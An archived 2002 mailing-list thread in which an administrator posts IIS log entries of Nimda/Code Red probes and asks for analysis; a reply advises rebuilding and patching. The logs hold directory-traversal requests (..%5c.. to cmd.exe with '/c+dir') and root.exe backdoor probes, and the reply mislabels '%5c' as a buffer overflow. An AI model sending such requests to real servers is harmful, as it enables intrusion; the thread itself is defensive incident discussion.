It is patched. Hey, I always keep my babies
patched! :) One question though, I though that
the "%5c" was the footprint of the "Double Decode"
file traversal attack. Is it an attempted buffer
overflow? Or, and my ignorance is showing here,
is a file traversal and a buffer overflow the same
thing? I know what a buffer overflow is.
It was my impression that a file traversal
was a flaw in the way IIS dealt with strings
representing directory paths.

Jim Grossl
Lee Pesky Learning Center
Boise, Idaho USA 

-----Original Message-----
From: Ravila White [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 16, 2002 11:35 AM
To: Jim Grossl
Subject: RE: IIS log files, can I have your take on these attacks?


 yeah...either nimda or code red you can tell from the MSADC and also see
the buffer overflow "%5c"

so the question is did you patch your server. When you go to MS security and
find the info on this you will be told to nuke/wipe/format and start from
scratch. This is a root level exploit. 

you can find more info on this at www.symantec.com or www.cert.com or
www.sans.org

after you rebuild please do the following:
1) bring the OS up to the latest service pack and hotfixes
2) Patch IIS appropriately
3) get the the microsoft security mailing list and the cert mailing list.

thxs./rav

-----Original Message-----
From: Jim Grossl
To: [EMAIL PROTECTED]
Sent: 1/15/02 8:23 AM
Subject: IIS log files, can I have your take on these attacks?



207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] 
  "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] 
  "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 3837

207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] 
  "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396



I kind of bothers me to post these on an open list (apparently
our Web server doesn't need any more "attention") but
I would like to know what everyone thinks of these attacks. My
Web server logged > 2000 of these attacks over the weekend. I'm 
pretty sure that attacks are not succeeding, but I've read that
if the "%5c" shows up in the Double Decode attack that the file
traversal is taking place. Thanks.

Jim Grossl

Reply via email to